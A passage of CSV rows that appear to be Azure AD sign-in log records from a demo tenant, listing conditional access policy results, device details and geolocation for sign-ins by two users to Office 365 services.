'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1dbd81fd-18f7-4582-ba72-d8f2f2811300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,1dbd81fd-18f7-4582-ba72-d8f2f2811300,SigninLogs,Sucess,50.6406517,5.572050095
+2011,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:48.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,87148da1-d94c-4cfd-b681-692dc80a64ce,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1dbd81fd-18f7-4582-ba72-d8f25c841300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,1dbd81fd-18f7-4582-ba72-d8f25c841300,SigninLogs,Sucess,50.6406517,5.572050095
+2012,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:53.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5c4893bf-4460-457a-b78b-f3504f5d836a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1dbd81fd-18f7-4582-ba72-d8f217851300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,1dbd81fd-18f7-4582-ba72-d8f217851300,SigninLogs,Sucess,50.6406517,5.572050095
+2013,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:50.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,650c50dc-6479-4b95-8f83-b8a51002dcaf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",429b44fe-fb38-41be-832c-f142a15f1000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,429b44fe-fb38-41be-832c-f142a15f1000,SigninLogs,Sucess,50.6406517,5.572050095
+2014,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:56.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8fbdb74c-7214-4790-b396-411dc46f90db,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Common Data Service,00000007-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",429b44fe-fb38-41be-832c-f14286601000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,429b44fe-fb38-41be-832c-f14286601000,SigninLogs,Sucess,50.6406517,5.572050095
+2015,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,06:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e302c415-86af-40d1-96d8-2da3b94dfa57,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:06,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",134c741e-1983-4152-9e8f-7188dc081000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,134c741e-1983-4152-9e8f-7188dc081000,SigninLogs,Sucess,33.7984581,-84.38828278
+2016,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:38.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f21e73fe-8173-4436-ae8c-f77c62e1c9cc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcdb0ed1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,09a9b111-0bef-49d6-ac1b-dbcdb0ed1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2017,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9c3abbd0-2030-4a0f-876d-90320a3c316b,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcdbded1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,09a9b111-0bef-49d6-ac1b-dbcdbded1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2018,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:38.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e8540ab0-e521-4672-a430-677185f95043,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, 